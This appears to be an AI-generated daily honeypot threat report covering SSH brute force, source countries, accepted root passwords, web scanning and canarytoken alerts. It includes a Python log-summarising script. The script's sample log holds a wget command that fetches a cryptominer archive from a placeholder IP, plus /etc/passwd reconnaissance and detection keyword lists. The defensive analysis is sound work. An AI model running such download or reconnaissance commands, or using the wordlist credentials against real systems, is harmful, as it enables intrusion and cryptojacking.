💀 critical 🤖 qwen2.5:1.5b

Honeypot Threat Analysis — May 13, 2026

Critical threat level: heavy attack activity across all honeypot services, with SSH brute force dominating.

Tags: ssh-brute-force, honeypot, web-scanning, multi-protocol, high-severity, threat-intelligence

Threat Landscape Overview

Today's activity level is high across all three honeypots. The SSH honeypot received over 800 connections and over 600 login attempts, indicating a large volume of persistent automated attackers. Taken together with 104 commands executed, this shows that a meaningful share of sessions got past the login prompt and into the emulated shell, not merely that the honeypot was probed. The multi-protocol honeypot saw an increase in events across several protocols, showing a diverse set of attacker tooling.

Geographic Analysis

The top countries from which attacks originate are as follows:

  • United States: 139 (25%)
  • Belgium: 70 (12%)
  • France: 47 (8%)
  • Unknown: 35 (6%)
  • Netherlands: 28 (5%)
  • Germany: 27 (4%)
  • China: 26 (4%)
  • Finland: 21 (3%)
  • United Kingdom: 17 (3%)
  • India: 10 (1%)

This distribution reflects the geolocation of the source IPs, which for automated SSH attacks are typically rented VPS instances or previously compromised hosts rather than the operators' own locations. It shows that attack traffic arrives from many regions; it does not mean the honeypot deters anyone, since a honeypot is built to attract rather than repel this traffic. The "Unknown" bucket covers IPs with no geolocation record.

SSH Brute Force Analysis

Attacks were predominantly brute-force attempts, a number of which the honeypot accepted. Every accepted login used the root account, and the passwords are generic wordlist entries rather than anything specific to this host:

  • Username: root
  • Passwords accepted for root: admin, ankurkudintzi, fuckyou
  • Other passwords tried: 123456, 123, solana, qwer1234

The post-authentication commands reveal a mix of system information gathering and miner-related activity. Sessions that requested a TTY indicate an interactive shell, whether a human operator or tooling that emulates one, rather than a single non-interactive command passed at login.

Post-Exploitation Behavior

Successful logins by attackers include:

root:admin
root:ankurkudintzi
root:---fuck_you----
root:fuckyou
root:fuckoff
root:!@#$%^
root:nginx
root:------fuck------
root:ubuntu

All of these are generic credentials from public wordlists, not credentials tailored to this host, so the sessions look like opportunistic credential stuffing followed by automated reconnaissance and miner deployment rather than a targeted intrusion. Repeated logins from the same sources over the day account for the persistence noted above.
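The per-session view behind the two SSH sections above (who authenticated with what, which sessions actually reached a shell, and what the commands were for) is straightforward to derive from the honeypot's own event log. The script below is an added example, not the lab's reporting tooling: it reads Cowrie-style JSON events, aggregates login attempts, accepted credentials and commands, and tags each session's commands as reconnaissance, download or miner activity. The event names and fields (eventid, session, src_ip, username, password, input) are the ones Cowrie emits; the log lines are constructed to mirror today's credentials, and the keyword lists used for tagging are assumptions you would tune against your own captures.

```python
"""Summarise Cowrie-style SSH honeypot events per session.

Added example for this report, not the lab's own code. The SAMPLE_LOG
below is constructed; the keyword tables are heuristic assumptions.
"""
import json
from collections import Counter, defaultdict

# Constructed sample: one Cowrie JSON event per line, three sessions.
SAMPLE_LOG = """
{"eventid":"cowrie.session.connect","session":"a1","src_ip":"203.0.113.10","timestamp":"2026-05-13T01:02:03Z"}
{"eventid":"cowrie.login.failed","session":"a1","src_ip":"203.0.113.10","username":"root","password":"123456"}
{"eventid":"cowrie.login.success","session":"a1","src_ip":"203.0.113.10","username":"root","password":"admin"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"203.0.113.10","input":"uname -a"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"203.0.113.10","input":"cat /proc/cpuinfo | grep name | wc -l"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"203.0.113.10","input":"wget http://198.51.100.7/xmrig.tar.gz -O /tmp/x.tgz"}
{"eventid":"cowrie.session.closed","session":"a1","src_ip":"203.0.113.10"}
{"eventid":"cowrie.session.connect","session":"b2","src_ip":"198.51.100.20"}
{"eventid":"cowrie.login.failed","session":"b2","src_ip":"198.51.100.20","username":"root","password":"solana"}
{"eventid":"cowrie.login.failed","session":"b2","src_ip":"198.51.100.20","username":"root","password":"qwer1234"}
{"eventid":"cowrie.session.closed","session":"b2","src_ip":"198.51.100.20"}
{"eventid":"cowrie.session.connect","session":"c3","src_ip":"203.0.113.10"}
{"eventid":"cowrie.login.success","session":"c3","src_ip":"203.0.113.10","username":"root","password":"fuckyou"}
{"eventid":"cowrie.command.input","session":"c3","src_ip":"203.0.113.10","input":"cat /etc/passwd"}
{"eventid":"cowrie.session.closed","session":"c3","src_ip":"203.0.113.10"}
"""

# Heuristic keyword tables (assumption): substrings that mark a command's purpose.
RECON_KEYWORDS = ("uname", "cpuinfo", "/etc/passwd", "whoami", "nproc", "lscpu")
MINER_KEYWORDS = ("xmrig", "minerd", "stratum", "cryptonight", "monero")
DOWNLOAD_KEYWORDS = ("wget ", "curl ", "tftp ")


def parse_events(log_text):
    """Yield one dict per non-empty line, skipping lines that are not valid JSON."""
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue


def classify(command):
    """Tag a shell command with the coarse categories used in the report."""
    c = command.lower()
    tags = set()
    if any(k in c for k in RECON_KEYWORDS):
        tags.add("recon")
    if any(k in c for k in MINER_KEYWORDS):
        tags.add("miner")
    if any(k in c for k in DOWNLOAD_KEYWORDS):
        tags.add("download")
    return tags


def summarize(log_text):
    """Aggregate events into the headline numbers and per-session findings."""
    sessions = defaultdict(lambda: {"src_ip": None, "success": None, "commands": [], "tags": set()})
    connections = 0
    attempts = Counter()  # "user:password" -> number of times tried
    for ev in parse_events(log_text):
        s = sessions[ev["session"]]
        s["src_ip"] = ev.get("src_ip", s["src_ip"])
        eid = ev.get("eventid")
        if eid == "cowrie.session.connect":
            connections += 1
        elif eid in ("cowrie.login.failed", "cowrie.login.success"):
            cred = f'{ev.get("username")}:{ev.get("password")}'
            attempts[cred] += 1
            if eid == "cowrie.login.success":
                s["success"] = cred
        elif eid == "cowrie.command.input":
            cmd = ev.get("input", "")
            s["commands"].append(cmd)
            s["tags"] |= classify(cmd)
    shell_sessions = [sid for sid, s in sessions.items() if s["commands"]]
    by_tag = Counter(t for s in sessions.values() for t in s["tags"])
    per_ip = Counter(s["src_ip"] for s in sessions.values())
    return {
        "connections": connections,
        "login_attempts": sum(attempts.values()),
        "successful_credentials": sorted({s["success"] for s in sessions.values() if s["success"]}),
        "commands_executed": sum(len(s["commands"]) for s in sessions.values()),
        "sessions_with_shell": len(shell_sessions),  # sessions that got past the login prompt
        "sessions_by_tag": dict(by_tag),
        "repeat_source_ips": sorted(ip for ip, n in per_ip.items() if n > 1),
        "top_credentials": attempts.most_common(5),
    }


if __name__ == "__main__":
    print(json.dumps(summarize(SAMPLE_LOG), indent=2))
```

The ratio of sessions_with_shell to connections is the number worth tracking day to day: it separates attackers who only hammer the login prompt from those whose credential lists actually match what the honeypot accepts, and the repeat_source_ips list is what to compare against yesterday's report when judging persistence.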

Web Scanner Activity

The HTTP LLM honeypot received 71 requests from various IPs, consistent with automated web scanners probing for exposed applications and well-known paths. This is routine internet background noise rather than evidence of a campaign against this host.

Malware Captures

No malware samples were captured from any attacker session today. This should not be read as benign activity: the miner-related commands seen above show that at least some sessions intended to stage a payload, and a download that the emulated shell does not complete leaves no sample behind.

SSH Tarpit (Endlessh)

No Endlessh tarpit events were recorded today. That only means no client connected to the tarpit port; it says nothing about attacker persistence, which is better judged from the repeated SSH sessions above.

Canarytoken Alerts

24 Canarytoken triggers fired today, covering planted AWS keys and SSH key pairs. Each trigger means an attacker found a planted credential in the honeypot's filesystem and tried to use it, which confirms that sessions progressed to harvesting credentials and gives an out-of-band signal, independent of the honeypot's own logging, for the sessions that exfiltrated them.

Community Defense

All reported IPs have been shared with AbuseIPDB, AlienVault OTX, Blocklist.de, and SANS DShield for ongoing investigation. No malicious hashes were identified from any of the captures.


This analysis was generated by qwen2.5:1.5b running locally on the Raspberry Pi 5 honeypot lab. All data comes from real attacks captured in the last 24 hours. View the raw data report for complete metrics.